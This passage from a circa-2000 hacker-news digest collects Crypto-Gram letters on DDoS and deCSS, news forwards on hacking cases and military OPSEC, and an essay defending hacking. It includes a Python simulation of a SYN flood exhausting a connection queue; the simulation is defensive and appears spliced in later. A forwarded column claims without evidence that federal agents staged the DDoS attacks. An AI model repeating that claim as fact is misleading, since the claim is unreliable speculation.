          5) no pointers to others who could vouch for points 2-4.
          6) source was not compilable as supplied (missing header).
      
      Point 6 is only a little important because it means the EXE's must be
      trusted as given.  But there was only one source file anyway, so you're
      already trusting the other EXE completely.  And both DLL's must be trusted
      completely.  Risk-wise, 75% blind trust is virtually identical to 100%
      blind trust, so it's not all that useful a distinction.  It's like choosing
      whether to kill something 3 times over or 4 times -- correctly killing it
      once suffices.
      
      Note that at no point does "professional integrity" come into this, only
      "professional practice".  I'm not disputing INTENT (integrity), I'm only
      describing OUTCOME (practice).  Spotless integrity and intent cannot long
      survive avoidable errors in practice.  By observing practices an observer
      might infer skill, integrity, or both, or neither.  Those judgements, and
      the trustworthiness criteria underlying them, are left completely to the
      particular observer.  All I can say is what I would infer from my
      observations, and why.  You should draw your own conclusions, since my
      criteria for trustworthiness may differ from yours.  But you should also
      invest in understanding why you came to those conclusions -- flaws in the
      process can lead you astray.
      
      
      From: "Rolf Oppliger" <rolf.oppliger@esecurity.ch>
      Subject: Distributed Denial-of-Service Attacks
      
      First of all, I'd like to congratulate you for your description and
      analysis of distributed denial-of-service (DDoS) attacks in the February
      issue of your Crypto-Gram newsletter.  I fully agree with most of your
      statements, including your pessimistic view that all existing approaches to
      address the problem are unsatisfactory in one way or another.
      
      In your article, however, you also argue that "in the long term,
      out-of-band signaling is the only way to deal with many of the
      vulnerabilities of the Internet, DDS attacks among them."  I don't agree
      with this statement.  Any out-of-band signaling channel can also be
      subjected to DoS and DDoS attacks.  I believe that the reason why telephone
      networks are not subjected to large-scale DoS and DDoS attacks is due to
      the fact that they address charging and billing, rather than their use of
      out-of-band signaling (out-of-band signaling has many advantages in other
      areas).  Trying to establish a huge quantity of connections in a telephone
      network is simply too expensive ... I think that the lesson learnt from
      telephone networks is that packet-based charging and billing -- combined
      with adequate security mechanisms -- may be a viable solution to protect
      against large-scale DoS and DDoS attacks on the Internet (rather than
      out-of-band signaling). However, packet-based charging and billing also has
      many disadvantages, including, for example, a huge administration
      overhead.  Consequently, I guess that packet-based charging and billing
      will not be applied on the Internet, and that "intelligent"
      packet-filtering performed by ISPs will be the major weapon to protect
      against large-scale DoS and DDoS attacks in the future.
      
      
      From: Ethan Benatan <benatan@duq.edu>
      Subject: Defending Against DOS Attacks: Draining the Swamp
      
      If you'll pardon the musings of a biologist, I'd like to comment on your
      swamp analogy.  I know you never stated so but it bears pointing out that
      swamps are not "bad" in any defensible sense, nor is draining them "good,"
      even though doing so may have one immediate desirable consequence.  I am
      sure that in your own field you can think of many examples where a cure,
      though effective, may have been worse than the disease.  The RISK here is
      forgetting that in any complex system change comes at some cost; the more
      complex (or less well understood) the system, the harder it is to predict
      the cost.  I think this applies to the Internet.  It certainly applies to
      the natural world, in spades.  I will not bore you with examples.
      
      
      From: pclites@cdsfulfillment.com
      Subject: deCSS
      
      In the February 2000 Crypto-Gram, you wrote: "An important point is that
      DVDs can be copied and pirated without using deCSS or any other decryption,
      which certainly makes the original claim of 'prevents piracy' look either
      astoundingly ignorant or brazenly deceptive."
      
      There is a sense in which the "prevents piracy" claim makes sense.  deCSS
      makes it easy to copy the data on a DVD not just onto another DVD, but into
      another format, one which is easier to copy & transmit.  In that sense, one
      could characterize it as making piracy easier.  Kind of like the rationale
      behind the distinction between printed & electronic versions of source code
      in the original crypto export restrictions; but for a consumer data
      product, I think it's a more meaningful distinction.  I would have to
      characterize the court's ruling as a correct application of a bad law, in
      what may turn out to be a watershed case.
      
      
      From: "Bryan Alexander" <xande1@bellsouth.net>
      Subject: Secure Linux
      
        > The NSA has contracted with Secure Computing Corp. for
        > a secure version of Linux.  Personally, I don't know if
        > the Linux license allows the NSA to make a secure version
        > of the operating system if they are not going to freely
        > distribute the results.
      
      Actually the GPL (Gnu Public License, which covers almost all parts of
      Linux) does allow this.  There is no language in the license that requires
      that you redistribute anything based on the GPL, only what you are required
      to do *if* you redistribute a work based on the GPL.  In addition, the GNU
      Project has said specifically that the license is not intended to prevent
      people from creating (without being forced to distribute) their own
      modified versions of GPLed software for their own use.  The text of the GPL
      is located at: <http://www.gnu.org/copyleft/gpl.html>.
      
      A statement about being forced to distribute modified versions of software
      being an "unacceptable restriction" can be found at
      <http://www.gnu.org/philosophy/apsl.html> under the heading "Disrespect for
      Privacy."  This is part of a discussion of the "fatal flaws" in the Apple
      APSL license.  (I can't find the original source for the comment about this
      as it relates to the GPL right now, sorry.)
      
      
      ** *** ***** ******* *********** *************
      
      CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
      insights, and commentaries on computer security and cryptography.
      
      To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
      blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe,
      visit http://www.counterpane.com/unsubform.html.  Back issues are available
      on http://www.counterpane.com.
      
      Please feel free to forward CRYPTO-GRAM to colleagues and friends who will
      find it valuable.  Permission is granted to reprint CRYPTO-GRAM, as long as
      it is reprinted in its entirety.
      
      CRYPTO-GRAM is written by Bruce Schneier.  Schneier is founder and CTO of
      Counterpane Internet Security Inc., the author of "Applied Cryptography,"
      and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served
      on the board of the International Association for Cryptologic Research,
      EPIC, and VTW.  He is a frequent writer and lecturer on computer security
      and cryptography.
      
      Counterpane Internet Security, Inc. is a venture-funded company bringing
      innovative managed security solutions to the enterprise.
      
      http://www.counterpane.com/
      
      Copyright (c) 2000 by Counterpane Internet Security, Inc.
      
      @HWA            
      
219.0 ISN:Mar 18th:Microsoft fends off hackers with Windows 2000
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      [Moderator: Ugh, this is a load. A "syn-flood" is designed to drive up CPU
       usage? Windows 2k fended this 'hacker' attack off?]
      
      Forwarded From: "Noonan, Michael D" <mdn@intel.com>
      
      (courtesy of Paul Thurrott's WinInfo - http://www.wininformant.com)
      
      Microsoft fends off hackers with Windows 2000
      
      In a controversial move sure to put the company square in the crosshairs
      of every hacker on the planet, Microsoft Corporation announced this week
      that it had successfully beaten off a "syn-flood" hacker attack Tuesday.
      As the Register's John Lettice notes, the company might have been better
      served by keeping the matter quiet. The attack, which is designed to bring
      a Web site to its knees by overloading processor capability, did little to
      slow down, let alone crash, the heavily clustered Microsoft Web site. The
      company says that it suffered only a 3-7% slowdown for a short period of
      time.
      
      "It was very minor, to be honest, so some people saw some slowdowns," said
      Microsoft spokesperson Adam Sohn. "We have a ton of overhead on this site.
      We can support terabytes and terabytes of downloads."
      
      The attack on Microsoft is the latest in a series of Web site attacks in
      recent weeks. Most of the previous attacks, which crippled Web sites such
      as Yahoo and eBay, were denial of service (DOS) attacks, which are
      designed to overload a Web server, making it incapable of serving actual
      users.  Investigators have yet to pinpoint the culprits in the previous
      attacks.  Microsoft says that it was able to determine where the attack on
      its Web site came from, however. The company alerted authorities and shut
      off their access to the company's Web site.
      
      Naturally, Microsoft credited Windows 2000 with saving the day.
      
      "The guys running the network swear to me that a year ago we would have
      been in big trouble, but with Windows 2000, nobody could knock our servers
      over,"  Sohn said. "Between the robustness of the OS and the security
      features built in, it really helped withstand the attack."
      
      Now doesn't that sound like a challenge?
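      As the moderator notes, the article's description of a SYN flood as something
      that overloads "processor capability" misses what the attack actually exhausts:
      the listener's queue of half-open connections (SYNs answered with a SYN-ACK that
      never receive the client's final ACK). Once that queue is full, new SYNs from
      honest clients are silently dropped, which is why the site, not the CPU, falls
      over. The following is an added example, not code from the article or from
      Microsoft, that replays a constructed (not captured) sequence of handshake events
      against a listener with a small fixed half-open queue and flags the source that
      is hoarding slots. The backlog size, the addresses and the timeout are
      assumptions chosen for the demonstration.

```python
from collections import defaultdict

# Constructed handshake events for the demonstration, not a real packet capture.
# Each tuple: (time in ms, source address, source port, flag)
#   "S"  client SYN: the server answers SYN-ACK and parks the connection half-open
#   "A"  client's final ACK: the handshake completes and the slot is released
EVENTS = []
# An honest client: every SYN is followed by its ACK 10 ms later.
for i in range(4):
    EVENTS.append((100 * i, "198.51.100.7", 40000 + i, "S"))
    EVENTS.append((100 * i + 10, "198.51.100.7", 40000 + i, "A"))
# A flooding source: a SYN every 10 ms and never an ACK (spoofed senders never finish).
for i in range(20):
    EVENTS.append((200 + 10 * i, "203.0.113.9", 50000 + i, "S"))
# A second honest client arriving after the flood has filled the queue.
EVENTS.append((500, "198.51.100.8", 41000, "S"))
EVENTS.append((510, "198.51.100.8", 41000, "A"))
EVENTS.sort()


def replay(events, backlog=8, timeout_ms=3000):
    """Replay (ms, src, sport, flag) events against a listener whose half-open
    queue holds at most `backlog` entries (assumed toy value). Returns a summary
    of who completed, who was dropped, and who is occupying the queue."""
    half_open = {}                 # (src, sport) -> time the SYN was queued
    dropped = defaultdict(int)     # SYNs discarded because the queue was full
    completed = defaultdict(int)   # handshakes that reached ESTABLISHED
    for ts, src, sport, flag in events:
        # Expire stale entries, as the kernel's SYN-RECV retransmit timer would.
        for key, queued in list(half_open.items()):
            if ts - queued > timeout_ms:
                del half_open[key]
        key = (src, sport)
        if flag == "S":
            if len(half_open) >= backlog:
                dropped[src] += 1      # queue full: SYN is silently discarded
            else:
                half_open[key] = ts    # SYN-ACK sent, waiting for the client's ACK
        elif flag == "A":
            if key in half_open:
                del half_open[key]     # handshake done, slot released
                completed[src] += 1
            # An ACK with no queued SYN (the client's SYN was dropped) is ignored.
    by_src = defaultdict(int)
    for src, _ in half_open:
        by_src[src] += 1
    return {
        "half_open_by_src": dict(by_src),
        "dropped_by_src": dict(dropped),
        "completed_by_src": dict(completed),
        "queue_in_use": len(half_open),
    }


def flagged_sources(summary, threshold=4):
    """Sources holding more half-open slots than one honest client plausibly
    would: the SYN-flood signature is many SYNs and no ACKs from the same place."""
    return sorted(src for src, n in summary["half_open_by_src"].items()
                  if n >= threshold)


if __name__ == "__main__":
    summary = replay(EVENTS)
    print("queue in use:", summary["queue_in_use"])
    print("dropped by source:", summary["dropped_by_src"])
    print("flagged:", flagged_sources(summary))
```

      With the toy queue of eight, the flooder occupies every slot after its eighth
      SYN; from then on its own SYNs and the honest clients' SYNs are dropped alike,
      while the server's CPU has done almost nothing. Raising the backlog (or using
      SYN cookies, which keep no state until the ACK arrives) is what makes the same
      event stream harmless, which is the sense in which a better-tuned stack
      "withstands" such an attack.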
      
      ISN is sponsored by Security-Focus.COM
      
      @HWA

220.0 ISN:Feds Behind Recent Massive Web Hacking/Fwd
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      2.23.00
      Feds Behind Recent Massive Web Hacking/Fwd
      
      
      During the unprecedented massive blitz of hack-attacks which brought some
      of the world's most active websites to an utter standstill in the second
      week of February through implementation of DDoS (distributed denial of
      service) tactics, NewsHawk made a basic "call" on the situation. To wit:
      we postulated that the hack-attacks, implemented on a scale and to an
      extent previously unheard-of, were most likely carried out by spooky
      cyber-goon squads in the employ of our beloved federal government.
      
      Since I am by no stretch of anyone's imagination what could even remotely
      be considered a computer geek or wirehead, nor am I particularly strong on
      researching issues which don't directly concern me, I made my call on the
      scene, solicited and published opinions from our mailing list on the
      situation and pretty much left it at that.
      
      Well, it turns out I wasn't the ONLY one who was more than a little bit
      suspicious that feds may have had more than a little bit to do with the
      hacking blitz.
      
      Indeed, MacAddict columnist Rich Pizor outdid us by a mile and actually
      researched the background of the whole situation: in particular with
      respect to certain proposals for an "Internet Gestapo" kind of deal known
      as the Federal Investigation and Detection Network, or FIDNet, which the
      Clinton gang had just recently been advancing as a means of "patrolling"
      cyberspace. The deafening chorus of either boos, hisses or just plain
      silence from all quarters which greeted the Clintonistas' Brave New
      World-style proposal caused a retreat of sorts, but according to Pizor's
      view, most likely only a temporary one. Indeed, one just long enough for
      these gangstas and goons to lick their wounds and come up with a PLAN
      which would make everyone fall slavishly in line with their malignant (as
      usual) machinations and devious schemes. Namely; the initiation of the
      overwhelming hack-attack tidal wave and blitzkrieg which devastated the
      Web a couple of weeks ago.
      
      It's an old Machiavellian game. Create a previously non-existent problem,
      and then let everyone cry and beg for you to provide a solution.
      
      Sheesh. And you thought WE get out on a limb with these kooky conspiracy
      scenarios.
      
      But seriously, we think Pizor is in fact ONE HUNDRED PERCENT correct in
      his suppositions.
      
      And what's REALLY interesting to us at NewsHawk, considering what we've
      put up with lately in terms of "mysteriously" missing or diverted emails
      and related malicious harassment, is the notice tacked on the end of
      Pizor's article, (which we've reprinted in full below):  "We were unable
      to bring you this column at its expected time and place in the Monday
      newsletter because our email server was having problems and our web site
      may have been under attack. COINCIDENCE?????"
      
      Uh... "coincidence"? No f**king WAY! As Charlie Chan used to say: "too many
      coincidence, no longer a coincidence."
      
      Get the picture?
      
      
      =-=-=-=
      
      
      Trigger Man
      by Rich Pizor
      
      mon feb.23
      
      A prevailing stereotype about the Internet is that it's full of
      crackpots hawking harebrained conspiracy theories to anyone who will
      listen. Any responsible media outlet should consider it their job to
      present a solid, professional appearance in an attempt to countermand
      that stereotype. I'm therefore pleased to bring you a crackpot
      conspiracy theory of my own, which revealed itself to me when I
      connected the dots while reviewing the recent spate of Distributed
      Denial of Service (DDoS) attacks.
      
      Before we proceed any further, I must indulge in one act of contrition.
      I didn't want to go here. Really, I didn't. But companies and websites
      that no one's ever heard of are blaming every little outage or security
      flaw on the omni-present shadow of hackers, crackers, cyberterrorists
      and iSaboteurs. I feel then that it is my right -- nay, my solemn duty
      -- to correct the balance and proffer speculation (since that's all that
      any of this really is) as to what might have really happened. Our legal
      department also wants me to point out that neither myself,
      MacAddict.Com, or Imagine Media are necessarily making any formal
      allegations. That being said...
      
      In order to understand the elegance of what's going on here, we need to
      go back in time to the middle of last year. It all started with what the
      Clinton administration obviously assumed would be an innocuous and
      welcome announcement: Clinton had pushed forth a proposal for something
      called FIDNet, or the Federal Investigation and Detection Network. A
      controversial proposal to say the least, but the plan drew particular
      fire in late January as EPIC (among others) loudly denounced the plan,
      saying that it would lead to nothing more than an Orwellian information state.
      
      So Clinton (not uncharacteristically) backed down...just days before the
      first DDoS attack incapacitated Yahoo for a day, along with twelve other
      major sites over the course of the next week -- seven of which have come
      forth with reports. Suddenly everything became the fault of crackers. A
      man in Virginia was even inspired to launch his own DoS attack on the
      Virginia DMV website (he only used his own computer, so there was no
      Distributed nature to it).
      
      Certainly coincidental timing for a President who's trying to get an
      unreceptive public to go along with his draconian cybersecurity plan.
      Especially given Janet Reno's recent testimony before Congress regarding
      the need for formalized laws on Internet security, citing those very
      attacks as her justification.
      
      But it gets better. Two days after the first attack, the FBI held a
      press conference in which they vowed to catch the perpetrator(s) but
      also admitted that they didn't have any idea, at that time, who did it.
      "A 15-year-old kid could launch these attacks," said the Bureau's Ron
      Dick (with a name like that it's no wonder he wound up in the FBI). Only
      a few days later, the news bubbles out that they're hot on the trail of
      a suspect named "mafiaboy" -- surprise surprise, a 15-year-old kid,
      conveniently in Canada and out of the Feds' reach without cooperation
      from the Royal Canadian Mounted Police.
      
      Most in the hacking community scoff at the thought that "mafiaboy" could
      be involved in anything more than a copycat role. He's widely considered
      to be a "script kiddie" -- an amateur cracker seeking fame through his
      exploits using tools downloaded off the Internet. So it's puzzling that
      the Feds would want him that badly; the name "Lee Harvey Oswald" keeps
      coming to mind. It's also unclear why they want to find Mixter -- an
      anonymous German hacker who may have authored one or more of the tools
      that may have been involved -- when he has publicly stated that he
      didn't do it, and the tools he may have authored were never released
      publicly except with the intention of studying DDoS attacks and how to
      counter them. The only other lead that's been made public is an
      anonymous email sent to Attrition.org (a site that archives hacked Web
      pages) that even the site's webmaster isn't taking too seriously.
      
      Am I coming right out and saying that the government we elected is
      behind all of this? Not directly. I have a hard time seeing most elected
      officials even being able to use a word processor, let alone pull off
      something like this. But you have to admit, the timing of all of these
      events is mighty convenient -- and while it's unlikely that they could
      have done it themselves, all it takes is money and connections to
      arrange for someone to pull a trigger.
      
      It calls to mind Judd Hirsch's line from Independence Day: "Well you
      didn't *really* think they paid $500 for a hammer did you?"
      
      NOTE: We were unable to bring you this column at its expected time and
      place in the Monday newsletter because our email server was having
      problems and our web site may have been under attack. COINCIDENCE?????
      
      
      Rich Pizor is the pseudonym of the man who claims to be Online Content
      Editor for MacAddict.com -- if he told you any more than that, he'd have
      to kill you. When he isn't hatching looney theories like this one, Rich
      types inflammatory things in chat rooms in the hopes of gaining
      immortality in an Echelon log.
      
      
      @HWA
      
221.0 ISN:Hacker 'Gatsby' Gets 18-Month Sentence
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

      Forwarded From: "John Q. Public" <tpublic@dimensional.com>
      
      
      http://www.foxnews.com/vtech/030500/hack.sml
      
      Hacker 'Gatsby' Gets 18-Month Sentence
      7.19 a.m. ET (1219 GMT) March 5, 2000
      Associated Press
      
      SAN DIEGO - A computer hacker known online as "The Gatsby" will
      spend 18 months in federal prison.
      
      A judge in San Diego has sentenced Jonathan Bosanac for electronically
      breaking into some of the country's largest computer systems.
      
      The judge said his wrongdoing caused more than $1 million in damage to one
      company alone.
      
      Bosanac was ordered to pay $10,000 in restitution to three telephone
      companies he hacked into.
      
      He pleaded guilty in December to participating in one of the nation's
      biggest hacking schemes.
      
      The crimes took place more than five years ago. Friends say the man's life
      has since turned around. He's been working as a computer consultant.
      
      
      @HWA      
      
222.0 ISN:Naval officer in hot water over policy
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      Forwarded From: William Knowles <wk@c4i.org>
      
      http://www.defensenews.com/dtemp/gomez.html
      
      WASHINGTON - A U.S. Navy petty officer who engaged in a recent Internet
      discussion of network security issues has inadvertently sparked a major
      controversy regarding military operations security, and whether Pentagon
      policy has kept up with the Information Age.
      
      Operations security (OPSEC) is closely related to information operations.
      Its primary goal is to "force the adversary commander to make faulty
      decisions based upon insufficient information and/or to delay the decision
      making process due to a lack of information,"  according to the Pentagon's
      joint doctrine written in 1997.
      
      During the height of the Cold War, military members were warned not to
      discuss such seemingly harmless things as unit morale, readiness or
      upcoming training missions because bits of information can be pieced
      together to learn a great deal about military operations.
      
      The Pentagon in October ordered that all military Internet sites be
      scrubbed of personal or sensitive tactical information.
      
      Now the Navy is investigating actions taken by Gene Gomez, a petty officer
      second class aboard the USS Essex - actions some experts say may provide
      potential adversaries with sensitive technical information that could
      allow them to infiltrate military networks, or make Gomez and his family
      vulnerable to terrorist activity.
      
      While he is under investigation, the former network administrator has been
      denied access to the ship's networks, has had his shipboard electronic
      mail capabilities disabled, and had his separation of service papers
      placed on hold.
      
      Gomez refused to comment on the situation.
      
      "I want to ensure that I don't get into any more trouble," Gomez told
      Defense News.
      
      On Dec. 18, Gomez engaged in a discussion on an electronic mailing list
      organized by the computer security Internet site AntiOnline. The topic of
      the discussion was how to bypass some particular network security
      measures. In addition, he used his official electronic mailing address
      aboard the Essex, and signed his full name and rank.
      
      The e-mail caught the attention of Rick Forno, co-author of the book, "The
      Art of Information Warfare." Forno wrote and published on the Internet an
      article, "The Need for Common Sense, Not Only Technical Competence,"
      blasting Gomez's actions.
      
      "Several aspects of [Gomez's] electronic mail messages are frightening,
      and should serve as a wake-up call to the military leadership regarding
      their perceived levels of OPSEC awareness throughout the military," Forno
      wrote.
      
      Forno conducted an Internet search on Gomez's name and found that earlier
      he had written to Happy Hacker Digest and to a group of so-called white
      hat hackers, the network security organization known as L0pht Heavy
      Industries.
      
      In these two separate messages, Gomez was seeking advice on how to disable
      some network functions he felt could be used to gain unauthorized access.
      
      Forno also found Gomez's personal Internet home page; a wealth of personal
      information; and information about the systems the sailor works with,
      including the Joint Maritime Command Information System, a strategic level
      command and control system.
      
      The article ignited a controversy, and led to a minor cyber war of words
      between Forno and Gomez and their respective supporters.
      
      The Pentagon effort to scrub Internet sites of such information did not
      address the issue of military members disclosing the same kind of
      information on non-military Internet sites.
      
      And Gomez is not the only military member using non-military Internet
      sites to disclose information that may not be allowed on military sites.
      Lt. Cmdr. Sheila Scarborough, executive officer aboard the USS Fort
      McHenry, for example, maintains a personal Internet site that offers
      details about her family, life aboard ship, and the ship's operations.
      
      Scarborough did not respond to Defense News questions mailed
      electronically.
      
      In addition, the Navy continues to provide daily Internet updates on the
      number of personnel on duty, the number of operational aircraft and ships,
      and the deployment status of the Fifth, Sixth and Seventh fleets. As of
      Jan. 3, the Navy listed 14 ships, 95 aircraft and 7,969 sailors and
      marines in the Persian Gulf.
      
      In an interview with Defense News, Forno downplayed the actual damage
      Gomez might have done to OPSEC, but said the situation "is indicative of
      the lack of online security awareness within the Department of Defense."
      
      In the aftermath of Gomez's alleged security violations, Forno and others
      now are calling for the Pentagon to take further steps to establish what
      should not be revealed by military members on non-military Web sites.
      
      "The Pentagon has not kept up with the Internet, despite being its parent.
      And yes, the Internet should be subject to OPSEC regulations, just as
      phones, radios, and message traffic is," said Ed Markin, a retired Navy
      pilot. "Odds are the vast majority of senior military officers have no
      concept of what all transpires on the Internet."
      
      Susan Hansen, Pentagon spokeswoman, countered that the Pentagon already
      has taken steps to caution military members on use of the Web.
      
      "The current [OPSEC] directive was updated and signed out by Deputy
      Secretary John Hamre on Nov. 29. It does include a specific reference to
      the World Wide Web by stating that 'the Department of Defense maintains
      heightened awareness of potential threats of adversaries taking advantage
      of publicly available information and other detectable unclassified
      activities to derive indicators of U.S.  intentions, capabilities,
      operations and activities'," Hansen said.
      
      The Navy's public affairs office did not respond by press time to a
      request for comment.
      
      
      @HWA               
      
223.0  ISN:Police to step up fight against e-crime
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

        Police to step up fight against e-crime

        Source: AAP | Published: Friday March 17, 3:38 PM 

        Police are set to recruit computer boffins in a bid to boost the fight 
        against so-called e-crime.

        The potential to commit crimes using computers and other information 
        technology was one of the greatest problems ever to face law 
        enforcement, Australian Federal Police Commissioner Mick Palmer said 
        today.

        Speaking at the end of a week-long conference of police commissioners 
        from Australia, New Zealand, Fiji and Papua New Guinea, Commissioner 
        Palmer said a staggering 900 million people would be using the Internet 
        by the end of this year.

        'People who abuse these technologies have the capacity to commit 
        offences on a global basis, with complete anonymity, with speed and on a 
        scale not previously encountered,' Commissioner Palmer told journalists.

        Credit card fraud, electronic vandalism, terrorism, electronic money 
        laundering and tax evasion are some examples of electronic crime.

        'The capacity of properly organised, electronic based crime to undermine 
        the financial stability of small and medium sized countries is very 
        real,' Commissioner Palmer said.

        A major problem for police is how to attract personnel with enough 
        technical expertise to fight this new crime.

        Commissioner Palmer said already police recruitment and selection was 
        becoming more flexible.

        'Clearly some of the technical skills that we are going to need ... come 
        at a very high cost,' he said.

        'People ... in that industry are earning a lot of money and that makes 
        the partnerships with business and the wider business community very 
        important.'

        Police will be looking to exchange staff with private industry to gain 
        the skills necessary, probably on short term, project based 
        arrangements.

        Commissioner Palmer said discussions and negotiations had already begun 
        on this issue and Commonwealth Bank CEO David Murray addressed the 
        commissioners.

        'We will be recruiting people from the coalface for short periods of 
        time, we are going to be sharing resources between ourselves and the 
        wider partnership both in the private and public sense.'

        The commissioners agreed to establish an Electronic Crime Steering 
        Committee to evaluate Australasia's capacity to fight electronic crime.

        It will develop an Australasian Law Enforcement Electronic Crime 
        Strategy by the end of June.
        
        @HWA
      
223.0 W00T:You already read section 223.0 you dumb ass.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   
      
      Fucking huge issue this isn't it? wtf am I nuts!?! no one even reads 
      this thing <sic>      
      
      Yeah its a hidden track. wow....we're possibly going to be affiliated
      with EUA coz like they're cool and shiznitz and besides _jeezus_ told
      me to.      
      
      Also the IBT people may be dragging my sorry ass into their fold, but
      we'll see... I have some issues there.
      
      Lessee, oh yeah i'm in b0f now, why? vanity of course. besides I passed
      the brainbench lame internet security cert exam (lol/phear).
      
      Military box has been probing my windows machine (one I surf and mail
      from) ds-1.chamb.disa.mil, I couldn't connect back it gave me a net
      unreach error so I guess its firewalled. If you're reading this, you
      guys should just join #EFnet IRC and /join #hwa.hax0r.news and chat.
      
      Don't probe my fucking box or i'll bite back. seen? you're not even
      my country's military, keep yer nose out and stop fucking strongarming
      the milmail people. assholes. I know who you are.
      
      To the guy that mailed me trying to get on the mailing list with "adept"
      in your name... first you mailed a trap email address, where did you
      find that one? second yeah i'm the same guy thats in #feed-the-goats
      what of it? who are you? :-))
      
      
      End of hidden track.
      
      Cruci-
      
      (C*:.)
      
      
224.0 ISN:Developers blasted on security
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      Forwarded From: William Knowles <wk@c4i.org>
      
      http://www.wired.com/news/politics/0,1283,34865,00.html
      
      WASHINGTON -- A top cyber security expert blasted software developers
      Thursday for marketing flawed products that he said boosted the Internet's
      vulnerability to hacker attacks.
      
      "There is little evidence of improvement in the security features of most
      products," said Rich Pethia, director of a federally funded computer
      emergency response operation at Carnegie Mellon University in Pittsburgh.
      
      "Developers are not devoting sufficient effort to apply lessons learned
      about the sources of vulnerabilities."
      
      Pethia made his comments to a congressional panel looking into the
      so-called denial-of-service attacks that disrupted access to popular Web
      sites last month for a few hours at a time.
      
      He said his organization, which responded to more than 8,000 computer
      security incidents last year, up from 132 in its first full year of
      operation 10 years ago, had found the same types of security defects in
      newer versions of products as in earlier ones.
      
      "Technology evolves so rapidly that vendors concentrate on time to market,
      often minimizing that time by placing a low priority on security
      features," he said in a statement to a subcommittee of the House Committee
      on Government Reform.
      
      The alleged lack of urgency in plugging such cracks is unlikely to change
      until customers demand that products that are more secure, Pethia said.
      Pethia did not criticize any companies by name in his prepared statement
      to the panel.
      
      
      @HWA
      
225.0 ISN:"Islands in the clickstream, in defense of hacking"
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From: richard@thiemeworks.com
      
      
      The following article was published in the Village Voice, February 16 - 22, 2000
      and the LA Weekly under the title "Hacking the Future."
      
      Islands in the Clickstream:
      In Defense of Hacking
      
      
      Let's get our definitions straight. Last week's attacks on dozens of Web
      sites were not the work of hackers. They were the work of script kiddies,
      and the difference is everything. Script kiddies download ready-made tools
      and use them to damage the network. Script kiddies criminally distort the
      essential ethos of hacking, which is to pass through the network without a
      trace. Hackers read the unknown, sense the contours of the codes that make
      tomorrow's booms and busts.
      
      It's no wonder that last week hackers everywhere cringed when the media
      confused them with script kiddies. Not less than 10 years ago, the word
      hacker conjured a dedicated geek, hunched over a glowing terminal, working
      late into the night to solve an intractable dilemma. Now hacker means
      something akin to cybercriminal. The semantic shift is regrettable, not
      only because the distortion inhibits clarity, but because it buries a
      piece of history we'd be wise to keep fresh: It was hackers who cobbled
      together the Internet.
      
      Hacking is a quest for knowledge. You can see the essence of the activity
      in meetings at security firms like Secure Computing, where hackers are a
      key part of the professional services team. With clients in the Fortune
      500 and three-letter government agencies, like DOD and NSA, the stakes are
      high, and when the firm faces a perplexing problem, brainstorming sessions
      go late into the night. Ideas fly from one person to another like pinballs
      off flippers, as the group mind turns over and examines the puzzle from
      all sides.
      
      The concept of a "group mind" flows from the structure of the Internet
      itself, parallel processor harnessed to parallel processor to achieve a
      single goal. It's no coincidence that information technology professionals
      often think in a style similar to the way computers calculate. The network
      taught them how to reason digitally; it imprinted itself on their minds
      just as they imprinted their minds on it.
      
      Is it any wonder, then, that hackers are the leaders of the new
      millennium? By leader I mean someone who forges ahead and names the
      emergent realities of the dim future. Consider Tim Berners-Lee, who
      designed the first Web protocols and wrote the first browser code.
      Berners-Lee was a hacker. Or consider Richard Stallman, the evangelist of
      Open Source software. Stallman is an extraordinary hacker.
      
      I recently consulted with a major mutual fund, and after the meeting I
      traded war stories with its head of IT. He fondly recalled the old days of
      hacking Unix systems. That this former "delinquent" now runs a system
      executing billion-dollar transactions is not shocking. Most of the bright
      people in the IT business learned how to hack by -- what else? -- hacking.
      
      Let's go back to Open Source for a moment. It's now the conventional
      wisdom that the Linux operating system and GNU Project are miracles of
      modern computing, which may one day triumph over the clunky software
      produced by the Microsoft-Apple cartel. Stallman launched the GNU Project
      by asking hackers to volunteer their services. Of course, they did.
      Likewise, Linux was founded on the belief that complex systems must be
      open, evolving, and free in order to reach their full potential. In other
      words, they must be hackable and they must be hacked. Continuously.
      
      Now comes the FBI and President Clinton with criminal sanctions for these
      script kiddies. It's right and just to keep the peace, but let's remember
      that in the Internet's embryonic stage, hacking, far from being criminal,
      was encouraged.  When computers were first networked through telephone
      lines and slow modems, bulletin boards emerged as crossroads where
      cybertravelers could leave messages and valuable information about how the
      phone lines intersected with microprocessors. By these postings, the
      network formed a symbiotic relationship with its users, and through the
      give and take of countless exchanges between hackers, the network
      bootstrapped itself to a higher level of complexity. As Tom Jackiewicz,
      who helps administer upt.org, an outgrowth of the hackers' favorite, the
      UPT Bulletin Board, recalls, "In the old days of a decade ago, no kid
      could afford a Solaris workstation. The only machines available were
      online. You could learn only by roaming the network."
      
      Today the stakes are higher, security tighter, but the basic modalities of
      hacking and its relationship to innovation remain. The challenge du jour
      is the gauntlet thrown down by Microsoft, which claims that Windows NT,
      the operating system of many businesses, is secure. What a claim! For a
      baseball fan it would be like hearing the Yankees brag that they could
      play an entire season without losing a single game. Hackers love to find
      flaws in Windows NT. For them, the payoff is the power rush of the thunk!
      when the stone hits Goliath in the forehead.
      
      One of the sharpest stones to leave a hacker's sling is a program called
      Back Orifice 2000. Developed by a group called Cult of the Dead Cow, the
      program can be loaded stealthily on a Windows network, giving a remote
      user control over the network. Why develop such a weapon? In the current
      environment of ubiquitous distributed computing -- that is, networks and
      nodes everywhere -- the hackers argue that no operating system protects
      against stealthy executables like Back Orifice. So the program is a form
      of shock therapy. It jerks Microsoft into action, stirring an indolent
      industry into making the Internet more secure. The upgrades that come as a
      result benefit every Windows user.
      
